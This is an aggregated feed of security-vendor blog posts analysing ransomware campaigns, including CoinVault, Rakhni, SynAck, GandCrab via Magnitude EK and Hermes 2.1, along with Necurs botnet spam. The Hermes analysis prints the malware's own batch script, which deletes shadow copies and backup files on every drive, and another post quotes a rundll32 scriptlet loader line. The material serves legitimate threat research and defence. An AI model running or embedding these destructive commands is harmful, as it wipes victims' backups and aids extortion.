CoinVault: Caught red-handed

Way back in 2015, Kaspersky Lab helped Dutch cyberpolice catch the creators of one of the very first pieces of ransomware, CoinVault. The decryptor we developed for it inspired the NoRansom portal, where we upload tools for unlocking files after various encryption attacks. Although CoinVault’s creators were caught a while ago, the first court hearing took place recently, and our expert Jornt van der Wiel attended.

CoinVault ran riot in 2014 and 2015 through dozens of countries around the world. Our experts estimate the number of victims at more than 10,000. Behind the attacks were two Dutch brothers, aged 21 and 25, who developed and distributed the Trojan. Every victim received a ransom demand for 1 bitcoin, which at the time was worth about 200 euros. The pair snagged about 20,000 euros as a result.

CoinVault was ahead of its time. In addition to encryption, it had features that we still see in ransomware Trojans today. For example, the victim was allowed to decrypt one file free. Mentally, this plays into the hands of the cybercriminals: When victims realize they are one click away from recovering their vital data, the temptation to pay up becomes stronger. The on-screen timer is another of CoinVault’s psychological teasers, inexorably counting down to a higher ransom demand.


Double Dutch

We studied CoinVault and described its structure in detail in late 2014. The malware authors took great pains to hide it from security solutions and hinder its analysis. The ransomware can determine, for example, whether it is being run in a sandbox, and its code is heavily obfuscated.

Nevertheless, our experts were able to get to the source code and find a clue that ultimately led to the criminals’ arrest: It contained some comments in Dutch. It was fairly likely that the malware hailed from the Netherlands.

We passed the information to the Dutch cyberpolice, and within a few months they reported the successful capture of the campaign masterminds. Thanks to our cooperation with the Dutch police, we managed to obtain the keys from the C&C server and develop a data decryption tool.


Lady Justice weighs the evidence

The police collected almost 1,300 statements from victims of the ransomware. Some of them appeared in court personally to demand compensation. One victim, for example, had their vacation ruined by the ransomware. They estimated the damage at 5,000 euros, saying that this sum would enable them to pay for another trip.

Another victim asked for the ransom to be paid back in the same coin — bitcoin. Since the attack, the cryptocurrency exchange rate has risen almost thirtyfold, so if the court satisfies the claim, it will be the first time that an injured party has earned money from a ransomware attack.

At the recent hearing, the prosecutors demanded punishment in the form of three months’ imprisonment, followed by a nine-month suspended sentence and 240 hours’ community service. The defense asked the court not to put the brothers behind bars, arguing that the defendants had cooperated with the investigation, plus one is irreplaceable in his current job and the other is in college. The verdict will be delivered at the next hearing, on July 26.


Trespassers will be prosecuted

We always say that giving in to criminals only encourages them. The trial of the CoinVault creators shows that even seemingly anonymous cybercriminals cannot escape punishment. But instead of waiting three years for justice, it’s better to protect yourself in advance. Remember our standard tips:

  • Don’t click on suspicious links and don’t open suspicious e-mail attachments.
  • Make regular backups of important files.
  • Use a reliable security solution.

Go to Source
Author: Anna Markovskaya

Rakhni Trojan: To encrypt and to mine

We recently posted that ransomware is giving way to miners at the top of the online threat rankings. In line with this trend, the Trojan ransomware Rakhni, which we’ve been watching since 2013, has added a cryptocurrency mining module to its arsenal. What’s interesting is that the malware loader is able to choose which component to install depending on the device. Our researchers figured out how the updated malware works and where the danger lies.

Our products spotted Rakhni in Russia, Kazakhstan, Ukraine, Germany, and India. The malware is distributed mainly through spam mailings with malicious attachments. The sample that our experts studied, for example, was disguised as a financial document. This suggests that the cybercriminals behind it are primarily interested in corporate “clients.”

A DOCX attachment in a spam e-mail contains a PDF document. If the user allows editing and tries to open the PDF, the system requests permission to run an executable file from an unknown publisher. With the user’s permission, Rakhni swings into action.


Like a thief in the night

When it’s started, the malicious PDF file appears to be a document viewer. First, the malware shows the victim an error message explaining why nothing has opened. Next, it disables Windows Defender and installs forged digital certificates. Only when the coast seems clear does it decide what to do with the infected device — encrypt files and demand ransom or install a miner.

Finally, the malicious program tries to spread to other computers inside the local network. If company employees have shared access to the Users folder on their devices, the malware copies itself onto them.


Mine or encrypt?

The selection criterion is simple: If the malware finds a service folder called Bitcoin on the victim’s computer, it runs a piece of ransomware that encrypts files (including Office docs, PDFs, images, and backups) and demands a ransom payment within three days. Details of the ransom, including how much, the cybercriminals kindly promise to send by e-mail.

If there are no Bitcoin-related folders on the device, and the malware believes it has enough power to handle cryptocurrency mining, it downloads a miner that surreptitiously generates Monero, Monero Original, or Dashcoin tokens in the background.


Go to Source
Author: Julia Glazova

SynAck ransomware: The doppelgängster

Malware tends to evolve, with crooks adding new functions and techniques to help it avoid detection by antivirus programs. Sometimes, the evolution is rather rapid. For example, SynAck ransomware, which has been known since September 2017 (when it was just average, not particularly clever), has recently been overhauled to become a very sophisticated threat that avoids detection with unprecedented effectiveness and uses a new technique called Process Doppelgänging.


Sneak attack

Malware creators commonly use obfuscation — attempts to make the code unreadable so that antiviruses will not recognize the malware — typically employing special packaging software for that purpose. However, antivirus developers caught on, and now antivirus software effortlessly unpacks such packages. The developers behind SynAck chose another way that requires more effort on both sides: thoroughly obfuscating the code before compiling it, making detection significantly harder for security solutions.

That’s not the only evasion technique the new version of SynAck uses. It also employs a rather complicated Process Doppelgänging technique — and it is the first ransomware seen in the wild to do so. Process Doppelgänging was first presented at Black Hat 2017 by security researchers, after which it was picked up by malefactors and used in several malware species.

Process Doppelgänging relies on some features of the NTFS file system and a legacy Windows process loader that exists in all Windows versions since Windows XP, letting developers create fileless malware that can pass off malicious actions as harmless, legitimate processes. The technique is complicated; to read more about it, see Securelist’s more detailed post on the topic.

SynAck has two more noteworthy features. First, it checks if it’s installed in the right directory. If it’s not, it doesn’t run — that’s an attempt to avoid detection by the automatic sandboxes various security solutions use. Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing. That’s a common technique for restricting malware to specific regions.


The usual crime

From the user’s perspective, SynAck is just more ransomware, notable mainly for its steep demand: $3,000. Before encrypting a user’s files, SynAck ensures it has access to its important file targets by killing some processes that would otherwise keep the files in use and off limits.

The victim sees the ransom note, including contact instructions, on the logon screen. Unfortunately, SynAck uses a strong encryption algorithm, and no flaws have been found in its implementation, so there is no way yet to decrypt the encrypted files.

We have seen SynAck distributed mostly by Remote Desktop Protocol brute force, which means it’s mostly targeted at business users. The limited number of attacks thus far — all of them in the USA, Kuwait, and Iran — bears out this hypothesis.


Getting ready for the next generation of ransomware

Even if SynAck is not coming for you, its existence is a clear sign that ransomware is evolving, becoming more and more sophisticated and harder to protect against. Decryptor utilities will appear less frequently as attackers learn to avoid the mistakes that made the creation of those decryptors possible. And despite ceding ground to hidden miners (just as we predicted), ransomware is still a big global trend, and knowing how to protect against all such threats is a must for every Internet user.

Go to Source
Author: Alex Perekalin

Magnitude exploit kit switches to GandCrab ransomware

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been known for several years and used by other families such as by Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.

"C:WindowsSystem32rundll32.exe" javascript:"..mshtml,RunHTMLApplication ";

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available Proof-of-Concept and package it as as a drive-by download instead.

On March 9th, MDNC discovered that a less common, but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware“.

By checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries part of the self hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:UsersPublic along with some other files:

The file “PUBLIC” contains a blob with RSA public key. It is worth noting that this key is unique on each run, so, the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key—the same plaintext produces various ciphertext. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code). Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:


Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian are found as the system language, it exits the process (0x419 being Russian, 422 Ukrainian, and 423 Belarusian).

It then creates two subprocesses – cmd.exe. One that copies itself into directory appdata/local/temp/svchost.exe, and another that executes the copied file.

It also generates crypto keys using standard CryoptAquireCOntext libraries, and saves the public key and some kind of ID into the following files:



As mentioned earlier, it writes out a script to auto run on startup with contents: start “” %TEMP%svchosta.exe into the Start menu startup folder. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved out the public key into a file so that it can later find that key and continue encrypting using a consistent key throughout all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle all available drives. If it is CDRom, it will skip it. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, not limited to Windows, Mozilla, and the recycling bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volume and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:backup*.* c:*.set c:*.win c:*.dsk
del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:backup*.* d:*.set d:*.win d:*.dsk
del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:backup*.* e:*.set e:*.win e:*.dsk
del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:backup*.* f:*.set f:*.win f:*.dsk
del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:backup*.* g:*.set g:*.win g:*.dsk
del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:backup*.* h:*.set h:*.win h:*.dsk
del %0

It then creates and executes another bat file called svchostaaexe.bat that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.

We have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware attacks the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat


Hermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs, one being a RSA hardcoded public key for the attackers.

Then, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.

Cryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.

Each file processing starts from checking if it was already encrypted. The ransomware uses the saved marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.

If the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The used identifier for the algorithm is 0x6610 (CALG_AES_256). That means 256-bit is using AES encryption. This key is used to encrypt the content of the file. The file is read and encrypted in chunks, with 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attacker’s RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.


Malwarebytes users are  protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.


Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:

  • 2018-02-27 (01:54 UTC)
    • staradvertsment[.]com
    • hunting.bannerexposure[.]info
  • 2018-02-28
    • staradvertsment[.]com
    • accompanied.bannerexposure[.]info
  • 2018-03-01
    • switzerland.innovativebanner[.]info
  • 2018-03-07
    • name.secondadvertisements[.]com
  • 2018-03-08
    • assessed.secondadvertisements[.]com
    • marketing.roadadvertisements[.]com
  • 2018-03-09
    • bannerssale[.]com
    • aquaadvertisement[.]com
    • technologies.roadadvertisements[.]com

IP addresses:

  • 159.65.131[.]94
  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.

How to decrypt files encrypted by the Shade ransomware

What is Cryakl?

The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control C&C server. Without this key, it is nearly impossible to recover files impacted by the malware. After that, Cryakl replaces the desktop wallpaper with contact details for its creators together with a ransom demand. Cryakl also displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.

Ransomware’s history and evolution in facts and figures

Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.

No More Ransom: A very productive year

How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.

Go to Source
Author: Anna Markovskaya

The Many Tentacles of the Necurs Botnet


Over the past five years the Necurs botnet has established itself as the largest purveyor of spam worldwide. Necurs is responsible for emailing massive amounts of banking malware, ransomware, dating spam, pump-n-dump stock scams, work from home schemes, and even cryptocurrency wallet credential phishing. Necurs sends so much spam that at times Necurs’ spam campaigns can make up more than 90% of the spam seen by Cisco Talos in one day.

To conduct a deeper analysis of Necurs, Talos extracted 32 distinct spam campaigns sent by Necurs between August 2017 and November 2017. The result was a collection of over 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses in over 200 countries and territories.

Necurs Recipients

From an email marketing and delivery perspective, Necurs doesn’t appear to be too sophisticated. Necurs’ recipient database includes email addresses that have been harvested online, commonly deployed role-based accounts, as well as email addresses that appear to have been auto-generated. These are among the worst, most unreliable sources for obtaining email addresses, and any legitimate email marketer wouldn’t last a day mailing to addresses such as these. Of course, an illegitimate botnet such as Necurs has no such concerns. For many months the email addresses in Necurs database seemed to be largely static; Necurs hasn’t actively added any new addresses for at least the past year, possibly two years or more. In November of 2017, Necurs stopped mailing to many of the autogenerated accounts.

At one of my personal domains, Necurs has been seen mailing to addresses such as ‘equifax@’ –an email address that was originally stolen from Equifax years before the 2017 breach. Necurs also often mails to ‘thisisatestmessageatall@’, another email address I generated and put into the wild, long ago. There are also variations on other legitimate addresses, for example ‘aeson@’, ’20jaeson@’, and ‘eson@’ which are all variations on my address ‘jaeson@’. The number 20 was present at the beginning of many of Necurs recipients. Hex 20 corresponds with the space character and is used in percent-encoding, etc. This provides further indication of the harvested nature of these addresses.

Other addresses in Necurs’ mailing list appear to have been auto-generated. For example ‘EFgUYsxebG@’, ‘ZhyWaTmu@’, and ‘MTAyOvoYkx@’ have never been aliases at my domain that I’ve ever used, and the only mail these accounts ever receive comes from Necurs.

Necurs email received at an auto-generated email address

From our set of Necurs’ spam messages, Talos extracted only the user alias portion of the To: address. There are numerous email aliases, such as role-based addresses, that appear to be in Necurs’ recipient DB across many different recipient domains. Strangely, the list also included some odd email aliases deployed at multiple domains such as ‘unity_unity[0-9]@’, ‘petgord32truew@’, ‘iamjustsendingthisleter@’, ‘docs[0-9]@’, and others.

Email alias and the number of domains in our data in which that alias was found

Interestingly, some of these same strange aliases can be found on Project Honeypot’s list of the Top Dictionary Attacker Usernames, though it is unclear whether Necurs obtained their aliases from this list, or whether these aliases made Project Honeypot’s list as a result of Necurs’ spamming activity.

Project Honeypot’s Top Dictionary Attacker Usernames

Necurs Sending IPs

Next, Talos extracted the sending IP addresses responsible for transmitting Necurs’ spam emails, and we grouped the data according to geographical location. Rather than being uniformly distributed worldwide, a majority of Necurs’ nodes were concentrated among just a few countries –India (25.7% of total spam), Vietnam (20.3% of total spam), and Iran (7.3% of total spam). More than half (51.3%) of the sending IP addresses in our data came from just these three countries. In contrast, other large industrialized nations were only responsible for tiny fraction of the spam. For example, the United States, was home to 6,314 (less than 1%) of Necurs sending IPs. The country of Russia was only attributed to 38 sending IP addresses out of a nearly 1.2 million total sender IPs!

Number of spam messages sent per country

Talos also analyzed the individual spam campaigns in order to determine how often the sending IP addresses were reused from campaign to campaign. We found very little infrastructure reuse. In fact, none of the sending IP addresses in our data were seen across all thirty-two of the campaigns we extracted. Only three sending IP addresses could be found across thirty of Necurs’ spam campaigns. The vast, vast majority of sending IP addresses, 937,761 (78.6% of the total), were only ever seen in a single Necurs spam campaign! This means that Necurs botnet is large enough to conduct attacks over several months without substantial reuse of most sending nodes –an impressive feat.

Number of unique IP addresses vs. how many campaigns in which they appeared

Necurs Spam Campaigns

Typically email campaigns from Necurs fall into one of two categories: high-volume weekday campaigns, or low volume continuous campaigns. Necurs has occasionally been seen sending high volume campaigns on weekends, but the vast majority of the time high volume campaigns are limited to the business week only. The mailing list database Necurs is using seems to be segmented, such that the high volume campaigns use one subset of email addresses from the DB, and the low volume campaigns use a different set of email addresses.


Below is an example of a pump-n-dump stock spam sent on April 12th, 2017 by Necurs touting the stock symbol QSMG, Quest Management Incorporated. On the following day the price of QSMG peaked at $2.33, probably netting the criminals a tidy gain on their initial investment. QSMG is currently worth less than $0.02.

A message touting the penny stock, QSMG
QSMG was at $2.33 on April 13. Currently it is worth less than $0.02


